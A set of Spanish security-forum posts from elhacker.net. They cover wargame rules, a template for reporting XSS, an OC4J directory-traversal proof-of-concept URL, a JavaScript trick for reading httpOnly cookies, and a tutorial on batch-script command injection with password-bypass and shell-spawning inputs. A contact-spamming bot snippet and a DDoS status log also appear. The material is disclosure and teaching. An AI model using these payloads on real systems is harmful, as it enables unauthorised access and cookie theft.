Todos los demas que pasen la prueba, tendran 10 puntos en warzone, sin promocion de rango.

Hay bonos:
> Modificar el MOTD agregando su nick.
     -     20 puntos
> Menor tiempo en pasarlo
     -    15 puntos
> Mejor documentacion de como pasarlo*
     -    15 puntos (+ cuenta @elhacker.net si no la tienen ya)
    *     Esta debe ser enviada de forma privada, se le daran los creditos al autor.
> Posiblemente mas, dependiendo de como se desenvuelva el torneo.

El wargame estara online 10 dias, pero podria estar mas tiempo.

En fin, esperamos contar con su presencia! les prometo sera divertido.. mas detalles de la prueba se colocaran en cuanto se acerque la fecha.

Saludos!!
#31
Nivel Web / OC4J Directory Traversal
7 Septiembre 2008, 20:17 PM
Es similar a uno de Tomcat que acaba de salir  >:D
Oracle apenas hoy me creyó que era una vulnerabilidad :xD

es 0day..

El ûber PoC
http://localhost:8888/webapp/SOMETHING/%c0%ae%c0%ae/WEB-INF/web.xml

lalala

Saludos!!
#33
WarZone / Reglas del subforo
3 Junio 2008, 00:26 AM
Reglas muy simples:
1.- No dar respuestas.
2.- No salirse del tema.

Cualquier duda que comprometa la prueba (dar una posible respuesta por ejemplo), deberá ser tratada por privado mandando un correo a warzone@elhacker.net

Sobre cualquier otra temática, este subforo se sujeta a las reglas del foro: http://foro.elhacker.net/reglas

Saludos!!
#34
WarZone / FAQ de WarZone
3 Junio 2008, 00:26 AM
en construccion
#35
Aqui se avisará sobre fallas técnicas en warzone, y los usuarios podrían reportar errores en la web de warzone.

RFE es "Request for Enchancement" (es decir, alguna caracteristica que te gustaría ver en warzone, por ejemplo.. implementar clanes o grupos).

Aqui solo puede haber dudas sobre la web (el sistema de la web), es decir, no sobre pruebas.

Cualquier cosa que tenga que ver con una prueba, se debe hacer en el subforo correspondiente.

Saludos!!
#36
Cualquier persona puede proponer una prueba.

Para proponer una prueba, se debe mandar un correo a warzone@elhacker.net con la descripción de esta, toda la documentación posible, y de ser posible, el código fuente de dicha prueba.

Por cuestiones de seguridad, solo aceptamos crackmes si se nos da el código fuente.

En caso de que solo sea una idea, si es buena, mándala.

Las mejores pruebas, serán implementadas y agregadas a warzone, y se les dará los créditos correspondientes a los usuarios que nos hayan apoyado.

Saludos!!
#37
Post para reportar de forma pública una vulnerabilidad de XSS o SQLinjection en un sitio web que no use software distribuido (es decir, que su código no sea accesible).

En caso de que sea software distribuido se puede crear un nuevo tema describiendo la vulnerabilidad.

Solo se permite la publicación de esta información en este tema, y no se puede crear un tema individual reportando este tipo de vulnerabilidades, en caso de hacerlo este será borrado.

El formato es el siguiente (ejemplo):


Sitio web: http://www.google.com/
Descubridor: sirdarckcat
URL del aviso: http://sirdarckcat.blogspot.com/2007/10/vulns-of-google-that-where-and-are-not.html
Fecha de descubrimiento: 27 de Julio del 2007
Fecha de notificación: 27 de Julio del 2007
Fecha de publicación: 13 de Octubre del 2007
Arreglado : Si, desde el 4 de Agosto del 2007
Información adicional: http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E



Es importante notar que los siguientes campos son obligatorios:
Sitio web, URL del aviso, Descubridor, Información adicional

Sinembargo Descubridor puede quedar como Anónimo.

Información adicional deberá contener la dirección de enlace al PoC o a una captura de pantalla.

En caso de que sea un enlace este deberá estar entre etiquetas [code][/code].

Además siguiendo con la política de disclosure (ver reglas), solo se aceptarán PoCs que:
CitarEn los foros públicos, la publicación de vulnerabilidades en sitios Web específicos, esta permitida, si y sólo si: ésta tiene un pagerank igual o superior a 4, fue publicada en otro lugar previamente, y el enlace se mantenga firme con lo estipulado en la sección II.A.2.b. En caso de que la vulnerabilidad sea de un software distribuido, se podrá describir la vulnerabilidad en el foro correspondiente. Sin embargo, en ese caso, esta prohibido colocar sitios Web vulnerables de terceros.
Es decir, URL del aviso debe ser una URL externa al foro, y es obligatoria (a menos que la vulnerabilidad ya haya sido arreglada).

Si no tienen un blog donde publicar estas vulnerabilidades, o les da flojera hacerlo, les recomiendo http://txt.io/ es rapido y sencillo. Pueden publicar exactamente lo que pusieron aqui en el foro, pero es importante que tengamos una fuente a donde enlazar el descubrimiento de la vulnerabilidad, para evitar problemas con los sitios web.

El código bbcode del formato es:

Citar[b]Sitio web: [/b]
[b]Descubridor: [/b]
[b]URL del aviso: [/b]
[b]Fecha de descubrimiento: [/b]
[b]Fecha de notificación: [/b]
[b]Fecha de publicación: [/b]
[b]Arreglado: [/b]
[b]Información adicional: [/b]
[code][/code]

Fuera de esto, comentarios sobre las vulnerabilidades aqui comentadas deberán estar en otro post.

Esto se deberá hacer "citando" el mensaje en cuestión en un tema nuevo.

Si el comentario es de pertinencia solo al autor del mensaje, este se deberá mandar por MP, y no en un tema nuevo, de lo contrario será borrado sin aviso.

Es todo! Gracias :)

Saludos!!
#38
Bueno, normalmente no les pondría estas cosas aqui, pero dado que a algunos de ustedes les podría interesar, y nunca vienen mal 500 pesos de mas, les dejo las convocatoria.

CitarConcurso de diseño: Logotipo Comercialmente.com.mx
Premio en efectivo: $500.00 (Pesos Mexicanos)
Fecha límite: Domingo 09 de diciembre de 2007, 0:00 hrs (media noche del sábado)
Limitantes: Hasta 3 entradas por participante
Estilo: Libre
Envía tu(s.) propuestas con todos tus datos y una explicación del logotipo a:

concurso [@ ] neonlightstudios.com

http: //www.neonlightstudios.com/concurso/concursologo.html (link-removido)

solo deben diseñar el logo, si algún usuario del foro gana, mandeme un MP y lo anuncio aqui, por lo pronto, cierro el tema..


Suerte chavos :P

//edit
no soy webmaster/admin/dueño/etc.. de esa web, cualquier cosa/pregunta/comentario al correo que les dí.
#39
Nivel Web / WW-XSS para firefox usando JAR URI..
11 Noviembre 2007, 03:09 AM
Este es como el tema de la semana en webappsec.

WW-XSS significa "World Wide XSS", y eso es que un XSS estaría afectando muchísimos sitoos web en internet, entre ellos esta este foro.

pdp recientemente "reveló" la existencia y posibilidades de explotación del URI "JAR:".. aqui:
http://www.gnucitizen.org/blog/web-mayhem-firefoxs-jar-protocol-issues

Poco despues beford descubrió que tiene una pequeña vulnerabilidad que permite robar el SOP en sitios que usan redirecciones:
http://blog.beford.org/?p=8

En este caso en google.. dado que una redirección NO ES una vulnerabilidad, sino una feature "peligrosa", en este caso todos los usuarios de firefox que usen servicios de google son vulnerables a XSS, aunque google no tenga ninguna vulnerabilidad.

PDP explica este tema mas aqui:
http://www.gnucitizen.org/blog/severe-xss-in-google-and-others-due-to-the-jar-protocol-issues

Esto es bastante peligroso para los usuarios de firefox.. es dificil recomendarles algo.. ya que es un XSS persistente, que no puede detectar NoScript, asi que hasta que mozilla saque algún parche, o algo, no usen firefox..

Saludos!!

--actualizacion
giorgio maone, acaba de agregar un parche para NoScript en la version 1.1.8
http://noscript.net/?ver=1.1.8
Que detiene los ataques basados en redirecciones para violar la SOP
#40
Pues una de las novedades en Firefox 2.0.0.5 es la existencia de las cookies httpOnly.

Son algo asi:

Set-Cookie: cookie=valor; httpOnly;

y despues, es imposible accesarlas desde el atributo "cookie" en document..

Código (javascript) [Seleccionar]
document.cookie

Esto puede servir para evitar el robo de cookies, en ataques de XSS.

Sinembargo, poco despues de que salió, kuza55 de w4ck1ng, descubrió que en las peticiones AJAX, las cabeceras se envian de igual forma con las cookies, al hacer:

Código (javascript) [Seleccionar]
with(new XMLHttpRequest()){
open("GET",location,false);
send(null);
alert(getResponseHeader("Set-Cookie"));
}


En fin, esto debería cambiar en la siguiente version de Firefox, sinembargo, vale la pena mencionarlo, y puede ser explotado hasta que sea arreglado.

Saludos!!
este post quiere estar en un subforo de hacking web xD
#41

   Vulnerabilidades en programas BATCH


Dado que recientemente me he dado cuenta de que las aplicaciones remotas
estan usando cada vez mas aplicaciones BATCH, (de las cuales yo he hecho
varias), para generar herramientas, con las cuales se cree que su uso es
seguro, he decidido escribir este documento sobre las vulnerabilidades en
estos programas, para que se reconsidere su uso en su futuro.
Estas vulnerabilidades, las he nombrados segun su semejanza con vulnera-
bilidades a nivel web, las cuales son BATCH Injection y BATCH Command
Execution.







      BATCH Injection







Los que estén familiarizados con la seguridad a nivel web, seguramente
conocerán el término SQL Injection, o LDAP Injection, que nos permite
ejecutar sentencias SQL (o LDAP) en un interprete.
Mientras que estos ataques (especialmente SQLi), ya han sido ampliamente
estudiados, existe una variable, a la cual he llamado, BATCH Injection.
basándonos en el mismo princípio en el cual se basan las vulnerabílidades
de SQL Injection, el cual es insertar comandos extra, en una sentencia
con el uso de una variable comprometída, BATCH injection, nos permite
ejecutar comandos en un programa BATCH, que acepte alguna variable por
medio de el comando SET, o a travez de argumentos.

Puede que piensen que este ataque no es un vector de ataque remoto, pero
temo decirles que estan en un error. Aunque son pocas, existen programas
en los cuales, parte del código, utiliza BATCH, normalmente, para tareas
de administración via telnet. Un ejemplo, es el archivo en WindowsNT,
C:\WINNT\system32\login.cmd el cual aunque solo es una pantalla de
bienvenida, la cual nos da shell sin tener que vulnerar nada, demuestra
que el uso de archivos BATCH en tareas de administración telnet, es muy
común. Podemos ver el contenido a continuación:
>> type C:\WINNT\system32\login.cmd
   @echo off
   rem
   rem  Secuencia de comandos global predeterminada del inicio de sesión
   rem  para servidor Telnet
   rem
   rem  En la instalación predeterminada, esta secuencia de comandos es
   rem  ejecutada cuando se ejecuta el comando inicial shell.  A cambio,
   rem  intentará invocar la secuencia de comandos del inicio de sesión
   rem  del usuario individual.
   rem

   echo *===============================================================
   echo Bienvenido al servidor Telnet de Microsoft.
   echo *===============================================================

   cd %HOMEDRIVE%%HOMEPATH% /d


Como podémos ver, no es necesário vulnerar nada, dado que se nos da acceso
inmediatamente a una shell, sinembargo, que tal que alguien, en un vago
intento de "asegurar" este código (alguien que no sabe configurar el
servidor telnet), tratará de reescribir este código a algo similar a:
>> copy con: login.cmd
   @echo off
   echo Bienvenido al sistema de administración via telnet.
   set /P pass=Por favor ingresa tu contraseña:
   if "%pass%"=="secreto" (
           echo PASSWORD CORRECTO
   ) else (
           echo PASSWORD INCORRECTO
           call %~nx0
   )
   ^Z
           1 archivos copiados.

Se espera que el lector ya entienda la programación en BATCH.
en este caso, al ejecutar el comando, nos dará:
>> login.cmd
   Bienvenido al sistema de administración via telnet.
   Por favor ingresa tu contraseña: incorrecto
   PASSWORD INCORRECTO
   Bienvenido al sistema de administración via telnet.
   Por favor ingresa tu contraseña: secreto
   PASSWORD CORRECTO

Mientras no escriba el password correcto, el codigo se volverá a llamar
a si mismo, de esta forma se asegura de que hasta que el usuario envie
el password correcto, no pasará de esa pantalla.
Ahora, debemos entender como funciona el parser de BATCH en Windows.
cuando nosotros escribimos en un código BATCH, algo como..
>> echo %LANG%
   es

El parser de batch, detecta la variable LANG, y la reemplaza por su
valor, es decir.. si hacemos algo como..
>> set cmd=ver
   
>> %cmd%

   Microsoft Windows 2000 [Versión 5.00.2195]

Lo que hace es reemplazar %cmd% por "ver", y ejecutar "ver". Ahora que
sabemos eso, nos debemos dar cuenta de que, por ejemplo, si tenemos un
programa asi:
>> copy con: prueba.bat
   @echo off
   set /P nombre=¿Como te llamas?
   echo Tu te llamas %nombre%
   ^Z
           1 archivos copiados.

Nosotros podémos hacer que se guarde el resultado en un archivo, de la
siguiente forma:
>> prueba
   ¿Como te llamas? sirdarckcat > salida.txt

Como vimos, la salida del comando, no se mostro, lo que si hubiera pasado
si solo hubieramos puesto el nombre.. mira:
>> prueba
   ¿Como te llamas? sirdarckcat
   Tu te llamas sirdarckcat

Y podemos comprobar que el archivo se escribió
>> type salida.txt
   Tu te llamas sirdarckcat

En fin, no solo podemos redirigir la salida de comandos, tambien podemos
ejecutar nuestros propios comandos, con el símbolo &
>> prueba
   ¿Como te llamas? sirdarckcat & ver
   Tu te llamas sirdarckcat
   
   Microsoft Windows 2000 [Versión 5.00.2195]

Interesante no? para ahora, ya te debes haber dado cuenta que nuestro
script login.cmd es vulnerable a algo.. y si, tienes razón.
>> login
   Bienvenido al sistema de administración via telnet.
   Por favor ingresa tu contraseña: "=="" ( REM
   PASSWORD CORRECTO

Te preguntarás que paso aquí.. porque me dijo PASSWORD CORRECTO? si yo
no sabía el password.. para eso, solo debemos de editar nuestro @echo off
>> copy con: login.cmd
   @echo on
   ¿Sobrescribir login.cmd? (Sí/No/Todo): t
   echo Bienvenido al sistema de administración via telnet.
   set /P pass=Por favor ingresa tu contraseña:
   if "%pass%"=="secreto" (
           echo PASSWORD CORRECTO
   ) else (
           echo PASSWORD INCORRECTO
           call %~nx0
   )
   ^Z
           1 archivos copiados.

veamos:
>> login

   >> echo Bienvenido al sistema de administración via telnet.
      Bienvenido al sistema de administración via telnet.

   >> set /P pass=Por favor ingresa tu contraseña:
      Por favor ingresa tu contraseña:"=="" ( REM

   >> if "" == "" (
      REM "=="secreto" (
       echo PASSWORD CORRECTO
      )  else (
      echo PASSWORD INCORRECTO
       call login.cmd
      )
      PASSWORD CORRECTO

Lo que hace REM, es comentar una linea, es decir, ignora todo lo que
esté despues de este, es el equivalente a "--" en MSSQL y a "/*" en mysql







      BATCH Command Execution







Al igual que BATCH Injection, supongamos que queremos que un programa
al cual aparentemente no podemos hacer nada, aun con el password correcto
ejecute un comando, como por ejemplo.. nos de una shell.. esto se puede
hacer con "&" (y despues veremos como con "|")
>> prueba
   ¿Como te llamas? eduardo&cmd
   Tu te llamas eduardo
   Microsoft Windows 2000 [Versión 5.00.2195]
   (C) Copyright 1985-2000 Microsoft Corp.
   
   >> exit

Como vimos, simplemente con &cmd, podemos ejecutar comandos, ahora ya
pensarás que solo hay que filtrarlo.. pues, filtremoslo.
>> copy con: prueba_seguro.bat
   @echo off
   set /P nombre=¿Como te llamas?
   set nombre=%nombre:&=_%
   set nombre=%nombre:>=_%
   set nombre=%nombre:<=_%
   set nombre=%nombre:|=_%
   set nombre=%nombre:"=_%
   echo Tu nombre es %nombre%
   ^Z
           1 archivos copiados.

>> prueba_seguro
   ¿Como te llamas? eduardo&cmd
   Tu nombre es eduardo_cmd

>> prueba_seguro
   ¿Como te llamas? eduardo|start /B cmd /K REM

   >>
>> Tu nombre es eduardo_start /B cmd /K REM
   
>> >> >>
Hey! que paso ahi? bueno, como ya te dije antes, cmd cambia las variables
por su contenido, es decir.. cuando hacemos, set nombre=%nombre:&=_%
el | es ejecutado.. por lo que CMD lee..
>> set nombre=eduardo|start /B cmd /K REM

>>
Lo que hace que salga 1 linea extra, aunque nada ahí es ejecutado.
ahora, tenemos todavia la posibilidad de ejecutar cosas con |
pero, que? cualquier comando, veremos su salida, pero yo quiero una shell
y para eso, haremos lo siguiente..
>> prueba_seguro
   ¿Como te llamas? &cmd ^
   Microsoft Windows 2000 [Versión 5.00.2195]
   (C) Copyright 1985-2000 Microsoft Corp.
   
   >> exit
   Microsoft Windows 2000 [Versión 5.00.2195]
   (C) Copyright 1985-2000 Microsoft Corp.
   
   >> exit
   Microsoft Windows 2000 [Versión 5.00.2195]
   (C) Copyright 1985-2000 Microsoft Corp.
   
   >> exit
   Microsoft Windows 2000 [Versión 5.00.2195]
   (C) Copyright 1985-2000 Microsoft Corp.
   
   >> exit

Esto: "&cmd ^" abrió 4 cmd.. porque? porque el caracter "^" quita lo que
esté despues de el, en este caso, un salto de línea.. por lo que al final
cmd interpreta..

set nombre=_cmd set nombre=  & cmd set nombre=  & cmd set nombre=  & cmd
   echo Tu nombre es   & cmd

Ahora porque no se filtra el caracter ^ tambien?
La respuesta es porque ese debería ser el caracter a filtrar primero
ya que de lo contrario, arrastra a todos los demas filtros, pero si ese
es el primero en filtrarse, entonces podríamos usar & para abrir una
shell.

Una manera de solucionar eso, es colocando un espacio en cada linea.

>> copy con: prueba_mas.bat
   @echo off
   set /P nombre=¨Como te llamas?
   set nombre=%nombre:&=_%
   set nombre=%nombre:>=_%
   set nombre=%nombre:<=_%
   set nombre=%nombre:|=_%
   echo Tu nombre es %nombre%
   ^Z
           1 archivos copiados.

De esta forma.. el ^ solo cancelará un espacio, en ves de un salto de linea
y aun asi, despues de tanto, aun podemos hacer una shell.. ya que SET al ser
canalizado, no guarda el valor, es decir.. si decimos:
>> set dia=1|echo.
   dia no valdra nada:
>> echo %dia%
   %dia%
Asi que.. para poder detener el uso de &, ese debe ser el caracter filtrado
primero, pero el caracter | puede anular los filtros, asi que ese tambien
debe ser anulado primero, asi que un filtro en batch es irreal.. lo que
se debe hacer, es no usar variables (manipulables por el usuario) en forma
%var%, ya que siempre es posible ejecutar comandos asi, la forma correcta
es la siguiente:
>> copy con: seguro.bat
   @echo off
   set /P nombre=Escribe tu nombre:
   set | find "nombre="
   ^Z
           1 archivos copiados.

>> seguro
   Escribe tu nombre: cmd|cmd&cmd^
   nombre=cmd|cmd&cmd^

Para concluir solo quiero decirles, que BATCH solo debe ser usado para
automatizar tareas, nunca para una interacción remota, a menos que en
el código NUNCA se usen variables expandibles.. Hasta hoy, no he encontrado
un filtro realmente seguro, usando FOR's, FIND, canalizaciones, etc. siempre
hay alguna forma de ejecutar algun comando, por lo que no se debe usar BATCH
en un entorno inseguro.

  Copyright (c) 2007 sirdarckcat@gmail.com
  Permission is granted to copy, distribute and/or modify this document
  under the terms of the GNU Free Documentation License, Version 1.2
  or any later version published by the Free Software Foundation;
  with no Invariant Sections, no Front-Cover Texts, and no Back-Cover
  Texts.  A copy of the license is available at:
   http://www.gnu.org/licenses/fdl.html
#42
Nota: necesitan iniciar sesion en warzone antes de ver los IDE.

WZVM
http://warzone.elhacker.net/wzvm/p.php?id=[ID_PRUEBA]

Tras leer la descripción del problema, veremos que se menciona que los datos, los debes obtener de la pila.. para cargar ESOS DATOS (del ejemplo), debemos dar click donde dice:

[Cargar los datos del caso de PRUEBA]

esto hará que nuestra pila contenga los datos que se encuentran en la descripción del problema.




JSJ
http://warzone.elhacker.net/js.php?id=[ID_PRUEBA]

el juez de javascript, funciona de forma similar, en este caso, a diferencia de los retos de programación tipo ACM, aqui no hay entrada de datos, estos ya se encuentran en memoria.. en las variables especificadas en la descripción del probelma.

la salida de datos, siempre se debe mostrar con la función print.

para cargar los datos del ejemplo en memoria deben dar click donde dice..

[Cargar los datos del caso de PRUEBA]




bueno, es todo :) espero este claro.. ;)

Saludos!!
#43
El tema ha sido movido a Hardware.

Creo que te pueden ayudar mas aca :P

http://foro.elhacker.net/index.php?topic=165385.0
#44
Se las presento :P
http://code.google.com/p/mzk

Cada programador puede hacer lo que guste con ella xD, por ejemplo..

Cambiarme de nick xD
Código (php) [Seleccionar]

<?php
    
include("mzk.php"); 
    
$t = new MezzengerKlient
    
$t->debug=true;
$t->onLogin="change_nick";
    
$t->init("mail@mail.com","password"); 
    
$t->login(); 
    
$t->main(); 
    
$t->quit(); 

function change_nick(){
global $t;
$t->setNick('I am a bot');
}
?>



Mandarle un mensaje a todos mis contactos
Código (php) [Seleccionar]

<?php
    
include("mzk.php"); 
    
$t = new MezzengerKlient
    
$t->debug=true;
$t->onLogin="spam";
    
$t->init("mail@mail.com","password"); 
    
$t->login(); 
    
$t->main(); 
    
$t->quit(); 

function spam(){
global $t;
for ($i=0;isset($t->onlinefriends[$i]);$i++){
$cont=@split(' ',$t->onlinefriends[$i]);
$t->MessageToNew($cont[0],"Hello");
}
}
?>



un bot.. webmessenger, etc..

espero les sirva :P, si alguien hace algun programa y quiere que lo ponga en "downloads", mandeme un mp :P

Saludos!!

// Editado por Ertai: Cambiadas las etiquetas de codigo para PHP!
#45
DEFCON 5



Para no tener que crear nuevos temas al respecto, mejor se queda 1 avisando del status del foro.

las definiciones son muy simples..

DEFCON 1 - Foro bajo ataque muy volátil (DDoS o cualquier tipo de ataque), dominio hospedado fuera del servidor oficial, acceso de solo lectura, o solo tras webproxys (la última vez que estuvimos en DC1 fue a principios del 2007).

DEFCON 2 - Foro bajo ataque muy volátil, pero controlado, y tras un servidor oficial, acceso para todos.

DEFCON 3 - Foro bajo ataque sencillo.. sin fallas significantes en el funcionamiento o velocidad del foro.

DEFCON 4 - Foro bajo amenazas, o soportando algun flood, o DoS que alenta un poco el servidor.

DEFCON 5 - Foro sin amenazas y sin ataques (La última vez que estuvimos en una situación DC5 fue en el 2002).

Noticias mas recientes hasta arriba

Cita de: sirdarckcat en  4 Abril 2010, 02:42 AM
Que tal!

El 2-3 de Abril de las 11:30 PM a la 1:30 AM (GMT) whk y yo (sdc) estuvimos haciendo pruebas de stress al servidor, que hicieron que el foro estuviera on/off de 11:30PM a 1:00 AM, y quedo completamente offline de 1:15 AM a 1:30 AM.

El bug fue descubierto por el bot de google! :P que vimos que consumia muchos recursos al entrar a una pagina.. Asi que oficialmente damos las gracias al bot crawleador de google.

Saludos!!

Cita de: sirdarckcat en  6 Febrero 2010, 23:28 PM
;-) un informante del 007 nos aviso que elhacker.net estaba en la mira:
Cita de: El_Informante_007 en  6 Febrero 2010, 21:30 PM
Señores alguien en el underground esta reclutando Bots y esta preparando algo verdaderamente grande en contra de elhacker.net hasta ahora tiene tres redes con diferentes funcionalidades lista para atacar el sitio...

No solo quieren dosear el sitio sino acceder a la BD de Users del Foro y comprometer a mas de un Usuario =====
jajajaja nuestra respuesta a este ataque fue cambiar el DEFCON del foro a de 3 DEFCON 4, y mandarle un link a nuestra wiki, sección de redes al "informante" para que deje de decir babosadas xDDDD

Cita de: sirdarckcat en 19 Enero 2010, 06:58 AMAlgun argentinoob nos ataco con un DoS y el foro estuvo off por 10 minutos (OMFG!!) estaba tratando de tumbar la BD de mysql.

Cita de: sirdarckcat en  7 Agosto 2009, 13:02 PM<false>
Parece ser que algun h4x0r fux0r que apoya a Georgia en el conflicto que tiene con Rusia ha estado atacando sitios web con ataques de DDoS.
http://en.wikipedia.org/wiki/2008-2009_Georgia%E2%80%93Russia_crisis
Asi que muchos sitios web cayeron victimas este ataque, entre ellas twitter, facebook, livejournal, y elhacker.net.

Estamos trabajando junto al equipo de Google, Twitter, Facebook, y LJ para detener estos ataques.</false>

El foro estuvo off unas cuantas horas hoy porque parece ser que el que hace la limpieza en el data center desconecto el servidor porque queria conectar su estereo y escuchar regeton.. todo es culpa del regeton.

Ya se ha despedido al limpia pisos regetonero y hemos contratado a una hermosa limpia pisos:
http://www.elhacker.net/files/nuevalimpapisos.jpg

Saludos!!

Cita de: sirdarckcat en  5 Julio 2009, 06:52 AM
hay que festejar!!!
el foro supero la maxima cantidad de usuariosbots conectados al mismo tiempo!!!
yayyyyyyyyy!!

Cita de: sirdarckcat en 24 Junio 2009, 06:30 AM
El foro volvio a empezar a recibir un ataque relativamente fuerte de forma intermitente la semana pasada, hasta ahora creemos que solo son pruebas antes del ataque real.

Era un simple flood a /index.php con bots que pueden leer ‫ ‫ ‫ ‫ ‫‬‬javascript (con IE).. Nada nuevo ni interesante.

Saludos!!

Cita de: el-brujo en  7 Mayo 2009, 18:57 PM
El disco duro del foro empezó a fallar ayer por la tarde... gracias a un aviso del SMART

No parecía muy grave, pero por precaución decidimos clonar el disco entero, un WD, al final no se pudo por errores y se ha instalado un Maxtor....

No se ha perdido ni mensajes ni nada, porque se ha podido recuperar todos los datos del viejo disco duro que ya no se usará más por precaución.

En total el foro ha estado casi 24 horas off-line, pero volvemos con HD nuevo ;D

Cita de: sirdarckcat en  8 Marzo 2009, 04:36 AM
Se han hecho públicas algunas estadísticas del ataque que ha recibido el foro en febrero del 2009, disponibles aquí:
http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro/estadisticas_del_ataque_de_ddos_que_recibio_el_foro_en_el_mes_de_febrero-t247746.0.html

Cita de: sirdarckcat en 16 Febrero 2009, 12:37 PMEl foro estuvo OFFLINE de 6am a 11am hora de españa, el dia Lunes 16 de Febrero del 2009.

El motivo fue hacer pruebas de stress al servidor SQL (al mejorar un ataque que se supone congela a SMF {que fue inefectivo en este foro}, al punto que tiro el servidor SQL por completo {despues de modificar el ataque agregando vectores de ataque mas complejos}).

Se va a modificar el codigo de SMF para que esto no vuelva a pasar (porque en realidad las pruebas no esperabamos que tiraran el servidor).

Disculpen las molestias que hayan ocasionado. Pero pueden estar seguros que el foro esta mas seguro que antes.

Saludos!!

Cita de: sirdarckcat en 14 Febrero 2009, 00:31 AMEl foro esta recibiendo un ataque de DDoS.. desde hace mucho tiempo, se puede leer mas al respecto aqui:
http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro/informacion_del_virusgusano_netzeek_de_msn-t242697.0.html

Las protecciones contra este ataque han sido muy efectivas, y este no es un factor determinante en el desempeño del foro.

Este ataque sinembargo aumento en potencia a principios del 2009, las protecciones funcionan correctamente, pero ahora tenemos una mejor manera de controlar y monitorear el ataque.

A principios de Marzo, se les mostrara un reporte detallando la evolucion del ataque de DDoS que hemos recibido con diversas estadisticas.